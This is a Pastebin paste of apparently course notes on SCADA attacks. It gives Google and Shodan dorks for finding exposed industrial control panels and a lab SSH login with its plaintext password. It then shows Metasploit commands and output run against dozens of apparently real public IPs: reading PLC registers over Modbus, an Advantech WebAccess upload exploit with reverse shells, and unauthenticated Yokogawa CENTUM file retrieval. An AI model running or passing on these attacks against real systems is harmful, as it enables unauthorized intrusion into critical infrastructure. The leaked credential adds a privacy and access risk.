joemccray

SCADA Security

May 6th, 2020
503
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 23.03 KB | None | 0 0
  1. ################
  2. ############################## # Google Dorks # ##############################
  3. ################
  4.  
  5. "login" intitle:"scada login"
  6.  
  7.  
  8.  
  9.  
  10.  
  11. ####################
  12. # Siemens Products #
  13. ####################
  14. inurl:/Portal0000.htm
  15. inurl:"Portal/Portal.mwsl"
  16. intitle:"Miniweb Start Page" | inurl:"/CSS/Miniweb.css"
  17.  
  18.  
  19. #####################################
  20. # Allen-Bradley Rockwell Automation #
  21. #####################################
  22. intitle:"Rockwell Automation" "Device Name" "Uptime"
  23. inurl:dtm.html intitle:1747-L552
  24. inurl:dtm.html intitle:1747-L551
  25. inurl:home.htm intitle:1766
  26.  
  27.  
  28.  
  29. ################
  30. ############################## # Shodan Dorks # ##############################
  31. ################
  32.  
  33. ######################
  34. # Schneider Electric #
  35. ######################
  36. PowerLogic PM800
  37. 8650 ION
  38.  
  39. Reference:
  40. https://www.slideshare.net/qqlan/icsscadaplc-googleshodanhq-cheat-sheet
  41.  
  42.  
  43.  
  44.  
  45. ###################################
  46. ############################## # Attacking SCADA with Metasploit # ##############################
  47. ###################################
  48.  
  49. ###################
  50. # Student account #
  51. ###################
  52. Here is a good tutorial that you should complete before doing the labs below:
  53. http://linuxsurvival.com/linux-tutorial-introduction/
  54.  
  55.  
  56. - I prefer to use Putty to SSH into my Linux host.
  57. - You can download Putty from here:
  58. - http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
  59.  
  60. Here is the information to put into putty
  61. ip: 149.28.239.26:4
  62. protocol: ssh
  63. port: 22
  64. user: secureninja-scada
  65. password: Hacking-ICS-123!!
  66.  
  67.  
  68. To run Metasploit:
  69. ---------------------------Type This-----------------------------------
  70. sudo msfconsole
  71. ----------------------------------------------------------------------
  72.  
  73.  
  74.  
  75. --------------------------------------------------------------------------------------------------------------------------------------------
  76.  
  77.  
  78.  
  79. Interpretation:
  80. When you are running modules then you may see output like this:
  81. connection was refused by the remote host: It generally mean we get blocked by firewall.
  82. The connection timed out: The service runs in different port, or it not running at all.
  83.  
  84.  
  85.  
  86. Some modules attack only windows based hosts, so it is better to filer the IPs by the running OS,
  87. check the operating system type using nmap:
  88.  
  89.  
  90. sudo nmap --script smb-os-discovery.nse -p445 <List of ip separated by space>
  91. -
  92.  
  93.  
  94.  
  95. --------------------------------------------------------------------------------------------------------------------------------------------
  96.  
  97.  
  98.  
  99. Using Metasploit we can search for Modbus Modules
  100. -------------------------------------------------
  101. Module: auxiliary/scanner/scada/modbusdetect Modbus Version Scanner
  102.  
  103.  
  104.  
  105.  
  106. ---------------------------Type This-----------------------------------
  107. use auxiliary/scanner/scada/modbusdetect
  108. set RHOSTS 127.0.0.1
  109. run
  110. ----------------------------------------------------------------------
  111.  
  112.  
  113.  
  114.  
  115. Output:
  116. [+] 127.0.0.1:502 - 127.0.0.1:502 - MODBUS - received correct MODBUS/TCP header (unit-ID: 1)
  117. [*] 127.0.0.1:502 - Scanned 1 of 1 hosts (100% complete)
  118. [*] Auxiliary module execution completed
  119.  
  120.  
  121.  
  122. --------------------------------------------------------------------------------------------------------------------------------------------
  123.  
  124.  
  125.  
  126. Find Unit ID's
  127. -------------------------
  128. Module: use auxiliary/scanner/scada/modbus_findunitid
  129.  
  130. ---------------------------Type This-----------------------------------
  131. use auxiliary/scanner/scada/modbus_findunitid
  132. set RHOSTS 127.0.0.1
  133. run
  134. ----------------------------------------------------------------------
  135.  
  136.  
  137.  
  138.  
  139.  
  140.  
  141. Output:
  142. [*] Running module against 127.0.0.1
  143.  
  144. [+] 127.0.0.1:502 - Received: correct MODBUS/TCP from stationID 1
  145. [+] 127.0.0.1:502 - Received: correct MODBUS/TCP from stationID 2
  146. [+] 127.0.0.1:502 - Received: correct MODBUS/TCP from stationID 3
  147. [+] 127.0.0.1:502 - Received: correct MODBUS/TCP from stationID 4
  148. [+] 127.0.0.1:502 - Received: correct MODBUS/TCP from stationID 5
  149. ...
  150. ^C[-] 127.0.0.1:502 - Stopping running against current target...
  151. [*] 127.0.0.1:502 - Control-C again to force quit all targets.
  152. [*] Auxiliary module execution completed
  153.  
  154.  
  155.  
  156. --------------------------------------------------------------------------------------------------------------------------------------------
  157.  
  158.  
  159.  
  160. Read and write data to a PLC using the Modbus protocol.
  161. -------------------------
  162. Module: auxiliary/scanner/scada/modbusclient Modbus Client Utility
  163.  
  164. ---------------------------Type This-----------------------------------
  165. use auxiliary/scanner/scada/modbusclient
  166. set DATA_ADDRESS 1
  167. set RHOSTS 85.105.152.58, 217.243.233.147, 37.84.40.39, 46.35.12.123, 91.189.101.99, 46.44.28.5, 81.168.114.148, 166.247.102.45, 120.157.47.29, 81.236.12.221
  168. run
  169. ----------------------------------------------------------------------
  170.  
  171.  
  172.  
  173.  
  174.  
  175.  
  176. Output:
  177. [*] Running module against 85.105.152.58
  178. [*] 85.105.152.58:502 - Sending READ HOLDING REGISTERS...
  179. [-] 85.105.152.58:502 - Unknown answer
  180. [*] Running module against 217.243.233.147
  181. [*] 217.243.233.147:502 - Sending READ HOLDING REGISTERS...
  182. [-] 217.243.233.147:502 - Error : ILLEGAL DATA ADDRESS
  183. [*] Running module against 37.84.40.39
  184. [*] 37.84.40.39:502 - Sending READ HOLDING REGISTERS...
  185. [+] 37.84.40.39:502 - 100 register values from address 1 :
  186. [+] 37.84.40.39:502 - [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
  187. [*] Running module against 46.35.12.123
  188. [*] 46.35.12.123:502 - Sending READ HOLDING REGISTERS...
  189. [-] 46.35.12.123:502 - Error : ILLEGAL DATA ADDRESS
  190. [*] Running module against 91.189.101.99
  191. [*] 91.189.101.99:502 - Sending READ HOLDING REGISTERS...
  192. [-] 91.189.101.99:502 - Error : ILLEGAL DATA ADDRESS
  193. [*] Running module against 46.44.28.5
  194. [*] 46.44.28.5:502 - Sending READ HOLDING REGISTERS...
  195. [+] 46.44.28.5:502 - 100 register values from address 1 :
  196. [+] 46.44.28.5:502 - [8224, 8224, 8224, 8224, 8224, 8224, 8224, 8224, 8224, 8224, 8224, 21041, 11825, 11829, 8224, 8224, 12846, 13368, 11843, 20533, 12340, 11845, 16723, 21504, 2, 0, 100, 229, 440, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2343, 2380, 2204, 500, 0, 0, 0, 0, 0, 0, 2, 2200, 500, 24, 0, 0, 0, 0, 0, 0, 2200, 1100, 2400, 500, 0, 0, 0, 0, 0, 0, 120, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
  197. [*] Running module against 81.168.114.148
  198. [*] 81.168.114.148:502 - Sending READ HOLDING REGISTERS...
  199. [-] 81.168.114.148:502 - Unknown error
  200. [*] Running module against 166.247.102.45
  201. [*] 166.247.102.45:502 - Sending READ HOLDING REGISTERS...
  202. [+] 166.247.102.45:502 - 100 register values from address 1 :
  203. [+] 166.247.102.45:502 - [42143, 16283, 1, 16000, 14756, 16271, 1, 16000, 30895, 16001, 30895, 16001, 53116, 16226, 53116, 16226, 31775, 16161, 51086, 16158, 44077, 16221, 44077, 16221, 0, 0, 0, 0, 0, 0, 22523, 16719, 0, 0, 0, 0, 0, 0, 0, 0, 17819, 18345, 0, 0, 0, 0, 0, 0, 40285, 16719, 0, 0, 0, 0, 0, 0, 0, 0, 30677, 18683, 0, 0, 0, 0, 0, 0, 0, 0, 15564, 17460, 27516, 16778, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 20482, 48281, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
  204. [*] Running module against 120.157.47.29
  205. [*] 120.157.47.29:502 - Sending READ HOLDING REGISTERS...
  206. [+] 120.157.47.29:502 - 100 register values from address 1 :
  207. [+] 120.157.47.29:502 - [1, 1, 1, 1, 0, 0, 0, 1, 533, 533, 421, 597, 721, 578, 0, 0, 0, 570, 21, 21, 21, 21, 21, 21, 0, 0, 0, 21, 11, 11, 10, 11, 10, 11, 0, 0, 0, 11, 1952, 1952, 1806, 1943, 1816, 1842, 0, 0, 0, 1872, 9, 32767, 0, 32767, 32767, 57, 32767, 0, 32767, 332, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0]
  208. [*] Running module against 81.236.12.221
  209. [*] 81.236.12.221:502 - Sending READ HOLDING REGISTERS...
  210. [+] 81.236.12.221:502 - 100 register values from address 1 :
  211. [+] 81.236.12.221:502 - [186, 219, 200, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767]
  212. [*] Auxiliary module execution completed
  213.  
  214.  
  215.  
  216. --------------------------------------------------------------------------------------------------------------------------------------------
  217.  
  218.  
  219.  
  220. Advantech WebAccess Dashboard Viewer uploadImageCommon
  221. -------------------------
  222. Module: exploit/windows/scada/advantech_webaccess_dashboard_file_upload
  223.  
  224. ---------------------------Type This-----------------------------------
  225. use exploit/windows/scada/advantech_webaccess_dashboard_file_upload
  226. set LHOST <PENTESTER_MACHINE_IP>
  227. set RHOSTS 180.106.49.61, 111.67.22.113, 18.216.97.13, 92.111.176.156, 167.172.236.47, 125.133.120.89, 74.207.241.183, 76.31.116.9, 34.193.252.20, 34.195.232.54, 111.67.22.114, 159.203.70.183, 190.61.51.235, 34.197.79.104, 40.87.45.154, 66.175.222.58, 5.196.95.208, 163.30.46.20, 18.221.95.245, 111.67.22.112, 176.93.42.26, 125.133.120.91, 52.221.99.106, 111.67.22.114, 173.201.2.17, 115.197.188.245, 97.64.205.26, 18.138.82.76, 159.65.254.19, 66.11.42.85, 13.234.163.37, 180.107.81.51, 111.67.22.112, 3.208.81.176, 212.61.153.5, 73.230.217.70, 128.53.84.248, 163.30.46.28, 220.130.7.227, 18.207.253.39
  228. run
  229. ----------------------------------------------------------------------
  230.  
  231.  
  232.  
  233.  
  234.  
  235.  
  236. Output:
  237. [*] Exploiting target 180.106.49.61
  238. [*] Started reverse TCP handler on 149.28.239.26:4444
  239. [-] Exploit failed: NoMethodError undefined method `get_json_document' for nil:NilClass
  240. [*] Exploiting target 111.67.22.113
  241. [*] Started reverse TCP handler on 149.28.239.26:4444
  242. [*] 111.67.22.113:80 - Target is not vulnerable.
  243. [*] Exploiting target 18.216.97.13
  244. [*] Started reverse TCP handler on 149.28.239.26:4444
  245. [-] Exploit failed: NoMethodError undefined method `get_json_document' for nil:NilClass
  246. [*] Exploiting target 92.111.176.156
  247. [*] Started reverse TCP handler on 149.28.239.26:4444
  248. [*] 92.111.176.156:80 - Target is not vulnerable.
  249. [*] Exploiting target 167.172.236.47
  250. [*] Started reverse TCP handler on 149.28.239.26:4444
  251. [*] 167.172.236.47:80 - Target is not vulnerable.
  252. [*] Exploiting target 125.133.120.89
  253. [*] Started reverse TCP handler on 149.28.239.26:4444
  254. [*] 125.133.120.89:80 - Target is not vulnerable.
  255. [*] Exploiting target 74.207.241.183
  256. [*] Started reverse TCP handler on 149.28.239.26:4444
  257. [-] Exploit failed: NoMethodError undefined method `get_json_document' for nil:NilClass
  258. [*] Exploiting target 76.31.116.9
  259. [*] Started reverse TCP handler on 149.28.239.26:4444
  260. [-] Exploit failed: NoMethodError undefined method `get_json_document' for nil:NilClass
  261. [*] Exploiting target 34.193.252.20
  262. [*] Started reverse TCP handler on 149.28.239.26:4444
  263. [*] 34.193.252.20:80 - Target is not vulnerable.
  264. [*] Exploiting target 34.195.232.54
  265. [*] Started reverse TCP handler on 149.28.239.26:4444
  266. [*] 34.195.232.54:80 - Target is not vulnerable.
  267. [*] Exploiting target 111.67.22.114
  268. [*] Started reverse TCP handler on 149.28.239.26:4444
  269. [*] 111.67.22.114:80 - Target is not vulnerable.
  270. [*] Exploiting target 159.203.70.183
  271. [*] Started reverse TCP handler on 149.28.239.26:4444
  272. [-] Exploit failed: NoMethodError undefined method `get_json_document' for nil:NilClass
  273. [*] Exploiting target 190.61.51.235
  274. [*] Started reverse TCP handler on 149.28.239.26:4444
  275. [-] Exploit failed: NoMethodError undefined method `get_json_document' for nil:NilClass
  276. [*] Exploiting target 34.197.79.104
  277. [*] Started reverse TCP handler on 149.28.239.26:4444
  278. [*] 34.197.79.104:80 - Target is not vulnerable.
  279. [*] Exploiting target 40.87.45.154
  280. [*] Started reverse TCP handler on 149.28.239.26:4444
  281. [*] 40.87.45.154:80 - Target is not vulnerable.
  282. [*] Exploiting target 66.175.222.58
  283. [*] Started reverse TCP handler on 149.28.239.26:4444
  284. [*] 66.175.222.58:80 - Target is not vulnerable.
  285. [*] Exploiting target 5.196.95.208
  286. [*] Started reverse TCP handler on 149.28.239.26:4444
  287. [*] 5.196.95.208:80 - Target is not vulnerable.
  288. [*] Exploiting target 163.30.46.20
  289. [*] Started reverse TCP handler on 149.28.239.26:4444
  290. [*] 163.30.46.20:80 - Target is not vulnerable.
  291. [*] Exploiting target 18.221.95.245
  292. [*] Started reverse TCP handler on 149.28.239.26:4444
  293. [*] 18.221.95.245:80 - Target is not vulnerable.
  294. [*] Exploiting target 111.67.22.112
  295. [*] Started reverse TCP handler on 149.28.239.26:4444
  296. [*] 111.67.22.112:80 - Target is not vulnerable.
  297. [*] Exploiting target 176.93.42.26
  298. [*] Started reverse TCP handler on 149.28.239.26:4444
  299. [-] Exploit failed: NoMethodError undefined method `get_json_document' for nil:NilClass
  300. [*] Exploiting target 125.133.120.91
  301. [*] Started reverse TCP handler on 149.28.239.26:4444
  302. [*] 125.133.120.91:80 - Target is not vulnerable.
  303. [*] Exploiting target 52.221.99.106
  304. [*] Started reverse TCP handler on 149.28.239.26:4444
  305. [*] 52.221.99.106:80 - Target is not vulnerable.
  306. [*] Exploiting target 111.67.22.114
  307. [*] Started reverse TCP handler on 149.28.239.26:4444
  308. [*] 111.67.22.114:80 - Target is not vulnerable.
  309. [*] Exploiting target 173.201.2.17
  310. [*] Started reverse TCP handler on 149.28.239.26:4444
  311. [*] 173.201.2.17:80 - Target is not vulnerable.
  312. [*] Exploiting target 115.197.188.245
  313. [*] Started reverse TCP handler on 149.28.239.26:4444
  314. [-] Exploit failed: NoMethodError undefined method `get_json_document' for nil:NilClass
  315. [*] Exploiting target 97.64.205.26
  316. [*] Started reverse TCP handler on 149.28.239.26:4444
  317. [*] 97.64.205.26:80 - Target is not vulnerable.
  318. [*] Exploiting target 18.138.82.76
  319. [*] Started reverse TCP handler on 149.28.239.26:4444
  320. [-] Exploit failed: NoMethodError undefined method `get_json_document' for nil:NilClass
  321. [*] Exploiting target 159.65.254.19
  322. [*] Started reverse TCP handler on 149.28.239.26:4444
  323. [-] Exploit failed: NoMethodError undefined method `get_json_document' for nil:NilClass
  324. [*] Exploiting target 66.11.42.85
  325. [*] Started reverse TCP handler on 149.28.239.26:4444
  326. [-] Exploit failed: NoMethodError undefined method `get_json_document' for nil:NilClass
  327. [*] Exploiting target 13.234.163.37
  328. [*] Started reverse TCP handler on 149.28.239.26:4444
  329. [-] Exploit failed: NoMethodError undefined method `get_json_document' for nil:NilClass
  330. [*] Exploiting target 180.107.81.51
  331. [*] Started reverse TCP handler on 149.28.239.26:4444
  332. [-] Exploit failed: NoMethodError undefined method `get_json_document' for nil:NilClass
  333. [*] Exploiting target 111.67.22.112
  334. [*] Started reverse TCP handler on 149.28.239.26:4444
  335. [*] 111.67.22.112:80 - Target is not vulnerable.
  336. [*] Exploiting target 3.208.81.176
  337. [*] Started reverse TCP handler on 149.28.239.26:4444
  338. [-] Exploit failed: NoMethodError undefined method `get_json_document' for nil:NilClass
  339. [*] Exploiting target 212.61.153.5
  340. [*] Started reverse TCP handler on 149.28.239.26:4444
  341. [-] Exploit failed: NoMethodError undefined method `get_json_document' for nil:NilClass
  342. [*] Exploiting target 73.230.217.70
  343. [*] Started reverse TCP handler on 149.28.239.26:4444
  344. [*] 73.230.217.70:80 - Target is not vulnerable.
  345. [*] Exploiting target 128.53.84.248
  346. [*] Started reverse TCP handler on 149.28.239.26:4444
  347. [-] Exploit failed: NoMethodError undefined method `get_json_document' for nil:NilClass
  348. [*] Exploiting target 163.30.46.28
  349. [*] Started reverse TCP handler on 149.28.239.26:4444
  350. [*] 163.30.46.28:80 - Target is not vulnerable.
  351. [*] Exploiting target 220.130.7.227
  352. [*] Started reverse TCP handler on 149.28.239.26:4444
  353. [-] Exploit failed: NoMethodError undefined method `get_json_document' for nil:NilClass
  354. [*] Exploiting target 18.207.253.39
  355. [*] Started reverse TCP handler on 149.28.239.26:4444
  356. [*] 18.207.253.39:80 - Target is not vulnerable.
  357. [*] Exploit completed, but no session was created.
  358.  
  359.  
  360.  
  361. --------------------------------------------------------------------------------------------------------------------------------------------
  362.  
  363.  
  364.  
  365. Discover host information through the Digi International ADDP service
  366. ---------------------------------------------------------------------
  367. Module: scanner/scada/digi_addp_version
  368.  
  369. ---------------------------Type This-----------------------------------
  370. use auxiliary/scanner/scada/digi_addp_version
  371. set RHOSTS 159.138.247.118, 47.89.191.67, 117.78.0.83, 101.200.201.208, 159.138.241.185, 77.241.235.60, 47.108.135.77, 47.252.80.226, 47.90.76.10, 121.36.141.175, 159.138.241.185, 121.37.18.173, 121.37.20.93, 47.103.136.32, 185.135.81.161, 178.115.225.102, 121.37.23.213, 85.10.93.237, 119.3.173.22, 159.138.247.118, 121.36.137.187, 47.252.80.226, 116.62.39.231, 8.209.81.240, 47.103.124.74, 121.36.141.175, 119.3.157.114, 92.104.172.94, 121.37.23.213, 101.200.201.208, 47.89.191.67, 117.78.0.83, 159.138.147.130, 159.138.241.185, 47.108.135.77, 77.241.235.60, 47.90.76.10, 147.139.161.210
  372. run
  373. ----------------------------------------------------------------------
  374.  
  375.  
  376.  
  377.  
  378.  
  379.  
  380. Output:
  381. [*] Finding ADDP nodes within 159.138.247.118->147.139.161.210 (38 hosts)
  382. [*] Scanned 38 of 38 hosts (100% complete)
  383. [*] Auxiliary module execution completed
  384.  
  385.  
  386.  
  387. --------------------------------------------------------------------------------------------------------------------------------------------
  388.  
  389.  
  390.  
  391. Allow an unauthenticated user to interact with the Yokogawa CENTUM CS3000 service
  392. ---------------------------------------------------------------------------------
  393. Module: auxiliary/admin/scada/yokogawa_bkbcopyd_client
  394.  
  395. ---------------------------Type This-----------------------------------
  396. use auxiliary/admin/scada/yokogawa_bkbcopyd_client
  397. set action RETR
  398. set RHOSTS 182.23.4.50, 216.130.151.217, 114.57.190.20, 216.130.151.213, 182.253.27.117, 210.160.226.240, 216.130.151.25, 217.14.95.81, 183.91.86.107, 52.58.141.191, 216.130.129.52, 82.106.139.36, 216.130.151.225, 208.38.227.20, 183.101.49.60, 210.160.226.241, 116.12.151.216, 113.166.92.225, 12.200.223.55, 183.91.86.111, 182.30.224.104, 122.28.50.238, 60.248.154.24, 209.52.71.58, 203.125.202.69, 210.161.43.96, 103.82.146.13, 216.130.151.193, 216.13.183.207, 116.211.5.214, 182.30.224.86, 114.57.190.20, 182.30.224.237, 182.30.224.228, 182.30.224.228, 122.28.50.238, 216.130.151.17, 216.130.151.207, 60.43.234.117, 117.239.41.6, 217.117.3.162, 182.30.224.128, 182.30.224.253, 210.212.165.150, 182.30.224.98, 60.43.234.117
  399. run
  400. ----------------------------------------------------------------------
  401.  
  402.  
  403.  
  404.  
  405.  
  406. Output:
  407. [*] 182.23.4.50:20111 - 27101
  408. [*] 182.23.4.50:20111 - Sending RETR packet...
  409. [-] 182.23.4.50:20111 - Auxiliary failed: Rex::ConnectionRefused The connection was refused by the remote host (182.23.4.50:20111).
  410. [-] 182.23.4.50:20111 - Call stack:
  411. [-] 182.23.4.50:20111 - /opt/metasploit-framework/embedded/lib/ruby/gems/2.6.0/gems/rex-socket-0.1.23/lib/rex/socket/comm/local.rb:298:in `rescue in create_by_type'
  412. [-] 182.23.4.50:20111 - /opt/metasploit-framework/embedded/lib/ruby/gems/2.6.0/gems/rex-socket-0.1.23/lib/rex/socket/comm/local.rb:263:in `create_by_type'
  413. [-] 182.23.4.50:20111 - /opt/metasploit-framework/embedded/lib/ruby/gems/2.6.0/gems/rex-socket-0.1.23/lib/rex/socket/comm/local.rb:33:in `create'
  414. [-] 182.23.4.50:20111 - /opt/metasploit-framework/embedded/lib/ruby/gems/2.6.0/gems/rex-socket-0.1.23/lib/rex/socket.rb:49:in `create_param'
  415. [-] 182.23.4.50:20111 - /opt/metasploit-framework/embedded/lib/ruby/gems/2.6.0/gems/rex-socket-0.1.23/lib/rex/socket/tcp.rb:37:in `create_param'
  416. [-] 182.23.4.50:20111 - /opt/metasploit-framework/embedded/lib/ruby/gems/2.6.0/gems/rex-socket-0.1.23/lib/rex/socket/tcp.rb:28:in `create'
  417. [-] 182.23.4.50:20111 - /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/tcp.rb:106:in `connect'
  418. [-] 182.23.4.50:20111 - /opt/metasploit-framework/embedded/framework/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb:86:in `send_pkt'
  419. [-] 182.23.4.50:20111 - /opt/metasploit-framework/embedded/framework/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb:70:in `exploit'
  420. [-] 182.23.4.50:20111 - /opt/metasploit-framework/embedded/framework/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb:47:in `run'
  421.  
  422. ....
  423. [*] Running module against 210.212.165.150
  424. [*] 210.212.165.150:20111 - 52431
  425. [*] 210.212.165.150:20111 - Sending RETR packet...
  426. [-] 210.212.165.150:20111 - Auxiliary failed: Rex::ConnectionTimeout The connection timed out (210.212.165.150:20111).
  427.  
  428.  
  429.  
  430. --------------------------------------------------------------------------------------------------------------------------------------------
  431.  
  432.  
  433.  
  434. References:
  435. https://www.peerlyst.com/posts/how-to-attack-and-defend-scada-systems-chiheb-chebbi
  436. https://www.hackers-arise.com/post/2016/11/25/scada-hacking-metasloit-scada-modules
  437. https://www.hackers-arise.com/post/2018/10/22/metasploit-basics-part-16-metasploit-scada-hacking
  438.  
  439.  
  440.  
  441.  
  442. ##############
  443. ############################## # SCADA CTFs # ##############################
  444. ##############
  445.  
  446.  
  447.  
  448.  
  449.  
  450.  
  451.  
  452.  
  453. References:
  454. https://advancedpersistentjest.com/2016/07/31/writeup-tmctf-iot100/
  455. https://github.com/digitalbond/CTF-Challenges
  456.  
  457. ####################
  458. ############################## # SCADA Simulators # ##############################
  459. ####################
  460.  
  461.  
  462.  
  463. References:
  464. https://github.com/sintax1/scadasim
  465. https://github.com/hi-KK/ICS-Common-Protocol-Simulator
  466. https://github.com/mjfarmer/scada_py
  467.  
  468.  
  469.  
  470.  
  471. ###################
  472. ############################## # SCADA Honeypots # ##############################
  473. ###################
  474.  
  475.  
  476.  
  477.  
  478.  
  479.  
  480.  
  481.  
  482.  
  483.  
  484. References:
  485. https://github.com/mushorg/conpot
  486. https://dtag-dev-sec.github.io/mediator/feature/2016/03/11/t-pot-16.03.html
Add Comment
Please, Sign In to add comment